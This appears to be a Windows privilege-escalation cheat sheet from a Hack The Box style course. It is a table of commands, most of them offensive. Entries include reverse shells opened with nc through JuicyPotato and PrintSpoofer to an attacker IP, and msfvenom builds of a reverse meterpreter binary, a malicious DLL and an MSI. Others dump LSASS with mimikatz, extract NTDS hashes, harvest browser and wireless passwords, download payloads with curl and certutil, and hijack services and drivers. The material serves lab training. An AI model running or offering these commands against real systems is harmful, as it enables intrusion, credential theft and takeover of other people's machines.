Window Privesc

Initial Enumeration

Command

Description

xfreerdp /v:<target ip> /u:htb-student

RDP to lab target

ipconfig /all

Get interface, IP address and DNS information

arp -a

Review ARP table

route print

Review routing table

Get-MpComputerStatus

Check Windows Defender status

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

List AppLocker rules

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone

Test AppLocker policy

set

Display all environment variables

systeminfo

View detailed system configuration information

wmic qfe

Get patches and updates

wmic product get name

Get installed programs

tasklist /svc

Display running processes

query user

Get logged-in users

echo %USERNAME%

Get current user

whoami /priv

View current user privileges

whoami /groups

View current user group information

net user

Get all system users

net localgroup

Get all system groups

net localgroup administrators

View details about a group

net accounts

Get passsword policy

netstat -ano

Display active network connections

pipelist.exe /accepteula

List named pipes

gci \\.\pipe\

List named pipes with PowerShell

accesschk.exe /accepteula \\.\Pipe\lsass -v

Review permissions on a named pipe

Handy Commands

Command

Description

mssqlclient.py sql_dev@10.129.43.30 -windows-auth

Connect using mssqlclient.py

enable_xp_cmdshell

Enable xp_cmdshell with mssqlclient.py

xp_cmdshell whoami

Run OS commands with xp_cmdshell

c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 443 -e cmd.exe" -t *

Escalate privileges with JuicyPotato

c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

Escalating privileges with PrintSpoofer

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Take memory dump with ProcDump

sekurlsa::minidump lsass.dmp and sekurlsa::logonpasswords

Use MimiKatz to extract credentials from LSASS memory dump

dir /q C:\backups\wwwroot\web.config

Checking ownership of a file

takeown /f C:\backups\wwwroot\web.config

Taking ownership of a file

Get-ChildItem -Path ‘C:\backups\wwwroot\web.config’ | select name,directory, @{Name=“Owner”;Expression={(Ge t-ACL $_.Fullname).Owner}}

Confirming changed ownership of a file

icacls “C:\backups\wwwroot\web.config” /grant htb-student:F

Modifying a file ACL

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

Extract hashes with secretsdump.py

robocopy /B E:\Windows\NTDS .\ntds ntds.dit

Copy files with ROBOCOPY

wevtutil qe Security /rd:true /f:text | Select-String "/user"

Searching security event logs

wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

Passing credentials to wevtutil

Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

Searching event logs with PowerShell

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

Generate malicious DLL

dnscmd.exe /config /serverlevelplugindll adduser.dll

Loading a custom DLL with dnscmd

wmic useraccount where name="netadm" get sid

Finding a user's SID

sc.exe sdshow DNS

Checking permissions on DNS service

sc stop dns

Stopping a service

sc start dns

Starting a service

reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Querying a registry key

reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

Deleting a registry key

sc query dns

Checking a service status

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local

Disabling the global query block list

Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3

Adding a WPAD record

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

Compile with cl.exe

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

Add reference to a driver (1)

reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

Add reference to a driver (2)

.\DriverView.exe /stext drivers.txt and cat drivers.txt | Select-String -pattern Capcom

Check if driver is loaded

EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys

Using EopLoadDriver

c:\Tools\PsService.exe security AppReadiness

Checking service permissions with PsService

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

Modifying a service binary path

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Confirming UAC is enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

Checking UAC level

[environment]::OSVersion.Version

Checking Windows version

cmd /c echo %PATH%

Reviewing path variable

curl http://10.10.14.3:8080/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"

Downloading file with cURL in PowerShell

rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll

Executing custom dll with rundll32.exe

.\SharpUp.exe audit

Running SharpUp

icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Checking service permissions with icacls

cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Replace a service binary

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Searching for unquoted service paths

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

Checking for weak service ACLs in the Registry

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

Changing ImagePath with PowerShell

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl

Check startup programs

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe

Generating a malicious binary

get-process -Id 3324

Enumerating a process ID with PowerShell

get-service | ? {$_.DisplayName -like 'Druva*'}

Enumerate a running service by name with PowerShell

Credential Theft

Command

Description

findstr /SIM /C:"password" *.txt *ini *.cfg *.config *.xml

Search for files with the phrase "password"

gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

Searching for passwords in Chrome dictionary files

(Get-PSReadLineOption).HistorySavePath

Confirm PowerShell history save path

gc (Get-PSReadLineOption).HistorySavePath

Reading PowerShell history file

$credential = Import-Clixml -Path 'C:\scripts\pass.xml'

Decrypting PowerShell credentials

cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt

Searching file contents for a string

findstr /si password *.xml *.ini *.txt *.config

Searching file contents for a string

findstr /spin "password" *.*

Searching file contents for a string

select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password

Search file contents with PowerShell

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

Search for file extensions

where /R C:\ *.config

Search for file extensions

Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Search for file extensions using PowerShell

cmdkey /list

List saved credentials

.\SharpChrome.exe logins /unprotect

Retrieve saved Chrome credentials

.\lazagne.exe -h

View LaZagne help menu

.\lazagne.exe all

Run all LaZagne modules

Invoke-SessionGopher -Target WINLPE-SRV01

Running SessionGopher

netsh wlan show profile

View saved wireless networks

netsh wlan show profile ilfreight_corp key=clear

Retrieve saved wireless passwords

Other Commands

Command

Description

certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

Transfer file with certutil

certutil -encode file1 encodedfile

Encode file with certutil

certutil -decode encodedfile file2

Decode file with certutil

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

Query for always install elevated registry key (1)

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Query for always install elevated registry key (2)

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

Generate a malicious MSI package

msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

Executing an MSI package from command line

schtasks /query /fo LIST /v

Enumerate scheduled tasks

Get-ScheduledTask | select TaskName,State

Enumerate scheduled tasks with PowerShell

.\accesschk64.exe /accepteula -s -d C:\Scripts\

Check permissions on a directory

Get-LocalUser

Check local user description field

Get-WmiObject -Class Win32_OperatingSystem | select Description

Enumerate computer description field

guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmd

Mount VMDK on Linux

guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1

Mount VHD/VHDX on Linux

sudo python2.7 windows-exploit-suggester.py --update

Update Windows Exploit Suggester database

python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt

Running Windows Exploit Suggester

PreviousLinux PrivescNextWeb-Proxies

Last updated